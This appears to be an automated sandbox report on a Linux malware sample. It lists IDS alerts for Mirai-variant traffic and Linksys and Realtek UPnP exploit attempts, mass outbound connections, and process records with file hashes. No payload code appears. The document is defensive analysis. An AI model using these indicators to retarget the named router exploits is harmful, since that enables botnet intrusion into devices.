              192.168.2.23172.245.10.4747618555552027153 05/14/22-02:20:49.434338TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4761855555192.168.2.23172.245.10.47
              192.168.2.2395.101.250.13939170802027121 05/14/22-02:20:20.235206TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3917080192.168.2.2395.101.250.139
              192.168.2.2395.216.219.7147596802027121 05/14/22-02:20:54.835828TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4759680192.168.2.2395.216.219.71
              192.168.2.23172.65.171.5156360555552027153 05/14/22-02:20:01.321931TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5636055555192.168.2.23172.65.171.51
              192.168.2.2395.101.175.10953748802027121 05/14/22-02:20:50.354166TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5374880192.168.2.2395.101.175.109
              192.168.2.2395.100.226.4159506802027121 05/14/22-02:20:17.686181TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5950680192.168.2.2395.100.226.41
              192.168.2.23172.65.0.4637458555552027153 05/14/22-02:19:47.505878TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3745855555192.168.2.23172.65.0.46
              192.168.2.23172.65.67.25360136555552027153 05/14/22-02:20:18.646690TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound6013655555192.168.2.23172.65.67.253
              192.168.2.23156.254.111.14935796528692027339 05/14/22-02:20:16.671077TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3579652869192.168.2.23156.254.111.149
              192.168.2.2395.227.197.13838594802027121 05/14/22-02:20:54.812324TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3859480192.168.2.2395.227.197.138
              192.168.2.23156.226.77.14938194528692027339 05/14/22-02:21:01.673878TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound3819452869192.168.2.23156.226.77.149
              192.168.2.2395.107.238.842926802027121 05/14/22-02:19:52.672564TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4292680192.168.2.2395.107.238.8
              192.168.2.2395.211.116.2738146802027121 05/14/22-02:21:00.478796TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3814680192.168.2.2395.211.116.27
              192.168.2.2395.197.61.8138884802027121 05/14/22-02:19:49.022506TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3888480192.168.2.2395.197.61.81
              192.168.2.23172.65.249.4833940555552027153 05/14/22-02:20:51.595958TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3394055555192.168.2.23172.65.249.48
              192.168.2.2395.217.135.24342834802027121 05/14/22-02:20:55.988944TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4283480192.168.2.2395.217.135.243
              192.168.2.23172.65.218.19958436555552027153 05/14/22-02:21:00.626814TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5843655555192.168.2.23172.65.218.199
              192.168.2.23172.255.82.18351098555552027153 05/14/22-02:20:05.589101TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5109855555192.168.2.23172.255.82.183
              192.168.2.2395.100.119.6334312802027121 05/14/22-02:20:14.964785TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3431280192.168.2.2395.100.119.63
              192.168.2.2395.100.125.23157540802027121 05/14/22-02:20:07.915542TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5754080192.168.2.2395.100.125.231
              192.168.2.2395.101.159.23540704802027121 05/14/22-02:20:08.033202TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4070480192.168.2.2395.101.159.235
              192.168.2.2395.140.228.956792802027121 05/14/22-02:20:20.211824TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5679280192.168.2.2395.140.228.9
              192.168.2.23172.65.233.12042736555552027153 05/14/22-02:20:49.353885TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4273655555192.168.2.23172.65.233.120
              192.168.2.2395.101.98.19232930802027121 05/14/22-02:20:39.136961TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3293080192.168.2.2395.101.98.192
              192.168.2.2395.100.221.435126802027121 05/14/22-02:21:03.799748TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3512680192.168.2.2395.100.221.4
              192.168.2.2395.167.25.16656372802027121 05/14/22-02:20:17.985650TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5637280192.168.2.2395.167.25.166
              192.168.2.23156.244.68.20160120528692027339 05/14/22-02:20:47.294814TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound6012052869192.168.2.23156.244.68.201
              192.168.2.2395.60.156.10853860802027121 05/14/22-02:21:00.524361TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5386080192.168.2.2395.60.156.108
              192.168.2.2395.111.225.14434616802027121 05/14/22-02:20:47.933416TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3461680192.168.2.2395.111.225.144
              192.168.2.2395.216.186.9556522802027121 05/14/22-02:20:52.533423TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5652280192.168.2.2395.216.186.95
              192.168.2.2395.210.63.2846488802027121 05/14/22-02:20:55.950179TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4648880192.168.2.2395.210.63.28
              192.168.2.2395.37.132.19058958802027121 05/14/22-02:21:20.792308TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5895880192.168.2.2395.37.132.190
              192.168.2.2395.101.234.7854962802027121 05/14/22-02:21:16.191228TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5496280192.168.2.2395.101.234.78
              192.168.2.23172.65.115.18055462555552027153 05/14/22-02:20:23.051525TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5546255555192.168.2.23172.65.115.180
              192.168.2.2395.179.190.17858986802027121 05/14/22-02:21:16.214470TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5898680192.168.2.2395.179.190.178
              192.168.2.2395.76.255.19543592802027121 05/14/22-02:20:08.094888TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4359280192.168.2.2395.76.255.195
              192.168.2.23172.65.134.933166555552027153 05/14/22-02:20:29.195623TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3316655555192.168.2.23172.65.134.9
              192.168.2.23112.160.255.7934852802027121 05/14/22-02:19:50.372101TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3485280192.168.2.23112.160.255.79
              192.168.2.2395.100.65.9453664802027121 05/14/22-02:21:38.570286TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5366480192.168.2.2395.100.65.94
              192.168.2.2395.131.48.13042684802027121 05/14/22-02:20:11.856209TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4268480192.168.2.2395.131.48.130
              192.168.2.2395.85.55.7252754802027121 05/14/22-02:19:54.487454TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5275480192.168.2.2395.85.55.72
              192.168.2.2395.217.35.16059362802027121 05/14/22-02:19:54.503319TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5936280192.168.2.2395.217.35.160
              192.168.2.2395.161.204.9052190802027121 05/14/22-02:20:44.023393TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5219080192.168.2.2395.161.204.90
              192.168.2.2395.182.108.1138782802027121 05/14/22-02:20:11.824320TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3878280192.168.2.2395.182.108.11
              192.168.2.23184.175.126.20139598555552027153 05/14/22-02:21:07.841944TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3959855555192.168.2.23184.175.126.201
              192.168.2.2395.217.181.9536450802027121 05/14/22-02:19:59.875020TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3645080192.168.2.2395.217.181.95
              192.168.2.23172.65.199.11259008555552027153 05/14/22-02:19:56.454379TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5900855555192.168.2.23172.65.199.112
              192.168.2.23172.65.193.3352616555552027153 05/14/22-02:20:08.849355TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5261655555192.168.2.23172.65.193.33
              192.168.2.2395.213.235.22448522802027121 05/14/22-02:19:54.520285TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4852280192.168.2.2395.213.235.224
              192.168.2.2395.110.132.14254226802027121 05/14/22-02:20:17.684118TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5422680192.168.2.2395.110.132.142
              192.168.2.2395.216.145.7241036802027121 05/14/22-02:20:47.995662TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4103680192.168.2.2395.216.145.72
              192.168.2.23172.65.109.235052555552027153 05/14/22-02:20:37.065066TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3505255555192.168.2.23172.65.109.2
              192.168.2.2395.166.198.559512802027121 05/14/22-02:21:03.779525TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5951280192.168.2.2395.166.198.5
              192.168.2.23172.65.31.18950858555552027153 05/14/22-02:20:49.354007TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5085855555192.168.2.23172.65.31.189
              192.168.2.23156.241.110.2058068528692027339 05/14/22-02:20:03.905573TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5806852869192.168.2.23156.241.110.20
              192.168.2.23172.65.200.1135036555552027153 05/14/22-02:20:53.942796TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound3503655555192.168.2.23172.65.200.11
              192.168.2.23172.65.179.441482555552027153 05/14/22-02:20:26.128794TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4148255555192.168.2.23172.65.179.4
              192.168.2.23172.65.105.19149352555552027153 05/14/22-02:20:08.866235TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4935255555192.168.2.23172.65.105.191
              192.168.2.23172.65.112.15449832555552027153 05/14/22-02:19:47.506025TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4983255555192.168.2.23172.65.112.154
              192.168.2.23156.238.49.12148200528692027339 05/14/22-02:21:15.972363TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound4820052869192.168.2.23156.238.49.121
              192.168.2.2395.128.133.2537696802027121 05/14/22-02:20:54.832547TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3769680192.168.2.2395.128.133.25
              192.168.2.2395.181.228.22134872802027121 05/14/22-02:20:52.551576TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3487280192.168.2.2395.181.228.221
              192.168.2.2395.100.69.12146056802027121 05/14/22-02:20:36.978503TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4605680192.168.2.2395.100.69.121
              192.168.2.2395.100.95.17146834802027121 05/14/22-02:20:29.920129TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4683480192.168.2.2395.100.95.171
              192.168.2.2395.100.193.20939220802027121 05/14/22-02:21:34.953417TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3922080192.168.2.2395.100.193.209
              192.168.2.23156.241.97.19351608528692027339 05/14/22-02:21:15.948106TCP2027339ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound5160852869192.168.2.23156.241.97.193
              192.168.2.2395.205.43.21034894802027121 05/14/22-02:21:16.310408TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)3489480192.168.2.2395.205.43.210
              192.168.2.2395.68.89.19059850802027121 05/14/22-02:20:37.007379TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5985080192.168.2.2395.68.89.190
              192.168.2.2395.217.110.15145094802027121 05/14/22-02:20:52.574667TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)4509480192.168.2.2395.217.110.151
              192.168.2.23172.65.217.21441418555552027153 05/14/22-02:21:27.712807TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound4141855555192.168.2.23172.65.217.214
              192.168.2.23172.65.64.4550134555552027153 05/14/22-02:21:15.021175TCP2027153ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound5013455555192.168.2.23172.65.64.45
              192.168.2.2395.101.153.18759730802027121 05/14/22-02:21:00.437923TCP2027121ET TROJAN ELF/Mirai Variant UA Outbound (Tsunami)5973080192.168.2.2395.101.153.187
              TimestampSource PortDest PortSource IPDest IP
              May 14, 2022 02:19:39.448509932 CEST42836443192.168.2.2391.189.91.43
              May 14, 2022 02:19:40.007436037 CEST50490443192.168.2.2379.4.215.45
              May 14, 2022 02:19:40.007462025 CEST50490443192.168.2.23210.53.96.235
              May 14, 2022 02:19:40.007473946 CEST50490443192.168.2.2342.150.13.65
              May 14, 2022 02:19:40.007477045 CEST50490443192.168.2.2394.173.230.55
              May 14, 2022 02:19:40.007477999 CEST4435049079.4.215.45192.168.2.23
              May 14, 2022 02:19:40.007482052 CEST50490443192.168.2.2342.233.184.219
              May 14, 2022 02:19:40.007505894 CEST44350490210.53.96.235192.168.2.23
              May 14, 2022 02:19:40.007504940 CEST50490443192.168.2.2337.139.78.108
              May 14, 2022 02:19:40.007512093 CEST50490443192.168.2.232.42.146.74
              May 14, 2022 02:19:40.007520914 CEST50490443192.168.2.23178.34.210.158
              May 14, 2022 02:19:40.007528067 CEST50490443192.168.2.2394.197.255.198
              May 14, 2022 02:19:40.007529974 CEST50490443192.168.2.2379.176.54.67
              May 14, 2022 02:19:40.007540941 CEST50490443192.168.2.23210.77.68.64
              May 14, 2022 02:19:40.007544994 CEST50490443192.168.2.2379.77.148.52
              May 14, 2022 02:19:40.007548094 CEST50490443192.168.2.2337.67.106.137
              May 14, 2022 02:19:40.007549047 CEST50490443192.168.2.2379.4.215.45
              May 14, 2022 02:19:40.007556915 CEST50490443192.168.2.232.38.39.153
              May 14, 2022 02:19:40.007563114 CEST50490443192.168.2.232.160.155.138
              May 14, 2022 02:19:40.007579088 CEST4435049037.67.106.137192.168.2.23
              May 14, 2022 02:19:40.007585049 CEST443504902.160.155.138192.168.2.23
              May 14, 2022 02:19:40.007591963 CEST50490443192.168.2.23210.53.96.235
              May 14, 2022 02:19:40.007591963 CEST50490443192.168.2.23118.220.152.103
              May 14, 2022 02:19:40.007596970 CEST443504902.38.39.153192.168.2.23
              May 14, 2022 02:19:40.007597923 CEST50490443192.168.2.2379.166.181.81
              May 14, 2022 02:19:40.007600069 CEST4435049079.176.54.67192.168.2.23
              May 14, 2022 02:19:40.007606983 CEST50490443192.168.2.23212.68.89.32
              May 14, 2022 02:19:40.007621050 CEST4435049079.166.181.81192.168.2.23
              May 14, 2022 02:19:40.007622004 CEST50490443192.168.2.23178.156.128.30
              May 14, 2022 02:19:40.007622957 CEST44350490212.68.89.32192.168.2.23
              May 14, 2022 02:19:40.007631063 CEST50490443192.168.2.232.160.155.138
              May 14, 2022 02:19:40.007632971 CEST50490443192.168.2.2379.210.175.153
              May 14, 2022 02:19:40.007637024 CEST44350490118.220.152.103192.168.2.23
              May 14, 2022 02:19:40.007646084 CEST50490443192.168.2.23212.36.91.252
              May 14, 2022 02:19:40.007647991 CEST44350490178.156.128.30192.168.2.23
              May 14, 2022 02:19:40.007649899 CEST4435049079.210.175.153192.168.2.23
              May 14, 2022 02:19:40.007653952 CEST50490443192.168.2.2342.207.213.92
              May 14, 2022 02:19:40.007656097 CEST50490443192.168.2.23212.68.89.32
              May 14, 2022 02:19:40.007661104 CEST50490443192.168.2.235.21.65.79
              May 14, 2022 02:19:40.007662058 CEST50490443192.168.2.2394.253.111.83
              May 14, 2022 02:19:40.007675886 CEST44350490212.36.91.252192.168.2.23
              May 14, 2022 02:19:40.007675886 CEST4435049042.207.213.92192.168.2.23
              May 14, 2022 02:19:40.007678986 CEST443504905.21.65.79192.168.2.23
              May 14, 2022 02:19:40.007679939 CEST50490443192.168.2.2337.67.106.137
              May 14, 2022 02:19:40.007687092 CEST50490443192.168.2.2379.166.181.81
              May 14, 2022 02:19:40.007688999 CEST4435049094.253.111.83192.168.2.23
              May 14, 2022 02:19:40.007689953 CEST50490443192.168.2.232.38.39.153
              May 14, 2022 02:19:40.007693052 CEST50490443192.168.2.23118.2.21.223
              May 14, 2022 02:19:40.007695913 CEST50490443192.168.2.235.102.69.144
              May 14, 2022 02:19:40.007700920 CEST50490443192.168.2.23210.156.184.35
              May 14, 2022 02:19:40.007707119 CEST50490443192.168.2.2379.210.175.153
              May 14, 2022 02:19:40.007714033 CEST50490443192.168.2.23109.240.48.21
              May 14, 2022 02:19:40.007714987 CEST44350490118.2.21.223192.168.2.23
              May 14, 2022 02:19:40.007723093 CEST44350490210.156.184.35192.168.2.23
              May 14, 2022 02:19:40.007726908 CEST50490443192.168.2.2394.221.195.101
              May 14, 2022 02:19:40.007730007 CEST50490443192.168.2.2394.253.111.83
              May 14, 2022 02:19:40.007733107 CEST44350490109.240.48.21192.168.2.23
              May 14, 2022 02:19:40.007734060 CEST443504905.102.69.144192.168.2.23
              May 14, 2022 02:19:40.007740974 CEST50490443192.168.2.2379.137.207.21
              May 14, 2022 02:19:40.007740974 CEST50490443192.168.2.23212.36.91.252
              May 14, 2022 02:19:40.007742882 CEST50490443192.168.2.23109.63.92.144
              May 14, 2022 02:19:40.007745028 CEST50490443192.168.2.23210.179.117.239
              May 14, 2022 02:19:40.007749081 CEST4435049094.221.195.101192.168.2.23
              May 14, 2022 02:19:40.007751942 CEST4435049079.137.207.21192.168.2.23
              May 14, 2022 02:19:40.007760048 CEST44350490109.63.92.144192.168.2.23
              May 14, 2022 02:19:40.007765055 CEST44350490210.179.117.239192.168.2.23
              May 14, 2022 02:19:40.007769108 CEST50490443192.168.2.23109.240.48.21
              May 14, 2022 02:19:40.007771015 CEST50490443192.168.2.23118.220.152.103
              May 14, 2022 02:19:40.007772923 CEST50490443192.168.2.2379.176.54.67
              May 14, 2022 02:19:40.007774115 CEST50490443192.168.2.23109.87.173.235
              May 14, 2022 02:19:40.007777929 CEST50490443192.168.2.2342.207.213.92
              May 14, 2022 02:19:40.007783890 CEST50490443192.168.2.23178.156.128.30
              May 14, 2022 02:19:40.007786036 CEST50490443192.168.2.2379.137.207.21
              May 14, 2022 02:19:40.007785082 CEST50490443192.168.2.23210.187.191.210
              May 14, 2022 02:19:40.007791042 CEST50490443192.168.2.235.21.65.79
              May 14, 2022 02:19:40.007793903 CEST44350490109.87.173.235192.168.2.23
              May 14, 2022 02:19:40.007797003 CEST50490443192.168.2.232.177.189.25
              May 14, 2022 02:19:40.007803917 CEST50490443192.168.2.235.102.69.144
              May 14, 2022 02:19:40.007805109 CEST44350490210.187.191.210192.168.2.23
              May 14, 2022 02:19:40.007812023 CEST50490443192.168.2.2394.25.120.63
              May 14, 2022 02:19:40.007817984 CEST50490443192.168.2.2394.19.31.188
              May 14, 2022 02:19:40.007819891 CEST443504902.177.189.25192.168.2.23
              May 14, 2022 02:19:40.007828951 CEST4435049094.25.120.63192.168.2.23
              May 14, 2022 02:19:40.007833958 CEST50490443192.168.2.2394.28.137.205
              May 14, 2022 02:19:40.007834911 CEST50490443192.168.2.23109.158.84.117
              May 14, 2022 02:19:40.007837057 CEST50490443192.168.2.23118.2.21.223
              May 14, 2022 02:19:40.007838011 CEST50490443192.168.2.23210.179.117.239
              May 14, 2022 02:19:40.007839918 CEST4435049094.19.31.188192.168.2.23
              May 14, 2022 02:19:40.007843971 CEST50490443192.168.2.23109.87.173.235
              May 14, 2022 02:19:40.007843971 CEST50490443192.168.2.2394.136.251.197
              May 14, 2022 02:19:40.007847071 CEST50490443192.168.2.2337.124.232.190
              May 14, 2022 02:19:40.007849932 CEST50490443192.168.2.23109.169.89.48
              May 14, 2022 02:19:40.007850885 CEST50490443192.168.2.23210.156.184.35
              May 14, 2022 02:19:40.007858038 CEST4435049094.28.137.205192.168.2.23
              May 14, 2022 02:19:40.007858992 CEST4435049037.124.232.190192.168.2.23
              May 14, 2022 02:19:40.007858038 CEST50490443192.168.2.23109.63.92.144
              May 14, 2022 02:19:40.007864952 CEST50490443192.168.2.23109.10.239.106
              May 14, 2022 02:19:40.007864952 CEST50490443192.168.2.2394.210.194.98
              May 14, 2022 02:19:40.007873058 CEST44350490109.169.89.48192.168.2.23
              May 14, 2022 02:19:40.007874966 CEST4435049094.136.251.197192.168.2.23
              • 127.0.0.1:80
              • 192.168.0.14:80

              System Behavior

              Start time:02:19:38
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:/tmp/pjT3uuMrF1
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:19:39
              Start date:14/05/2022
              Path:/tmp/pjT3uuMrF1
              Arguments:n/a
              File size:4956856 bytes
              MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1
              Start time:02:20:56
              Start date:14/05/2022
              Path:/usr/libexec/gnome-session-binary
              Arguments:n/a
              File size:334664 bytes
              MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb
              Start time:02:20:56
              Start date:14/05/2022
              Path:/bin/sh
              Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
              File size:129816 bytes
              MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c
              Start time:02:20:56
              Start date:14/05/2022
              Path:/usr/libexec/gsd-print-notifications
              Arguments:/usr/libexec/gsd-print-notifications
              File size:51840 bytes
              MD5 hash:71539698aa691718cee775d6b9450ae2
              Start time:02:20:57
              Start date:14/05/2022
              Path:/usr/libexec/gsd-print-notifications
              Arguments:n/a
              File size:51840 bytes
              MD5 hash:71539698aa691718cee775d6b9450ae2
              Start time:02:20:57
              Start date:14/05/2022
              Path:/usr/libexec/gsd-print-notifications
              Arguments:n/a
              File size:51840 bytes
              MD5 hash:71539698aa691718cee775d6b9450ae2
              Start time:02:20:57
              Start date:14/05/2022
              Path:/usr/libexec/gsd-printer
              Arguments:/usr/libexec/gsd-printer
              File size:31120 bytes
              MD5 hash:7995828cf98c315fd55f2ffb3b22384d
              Start time:02:21:29
              Start date:14/05/2022
              Path:/usr/bin/xfce4-session
              Arguments:n/a
              File size:264752 bytes
              MD5 hash:648919f03ad356720c8c27f5aaaf75d1
              Start time:02:21:29
              Start date:14/05/2022
              Path:/usr/bin/rm
              Arguments:rm -f /home/saturnino/.cache/sessions/Thunar-2ec9153f1-6fa0-4067-96b1-e5fe875b1e51
              File size:72056 bytes
              MD5 hash:aa2b5496fdbfd88e38791ab81f90b95b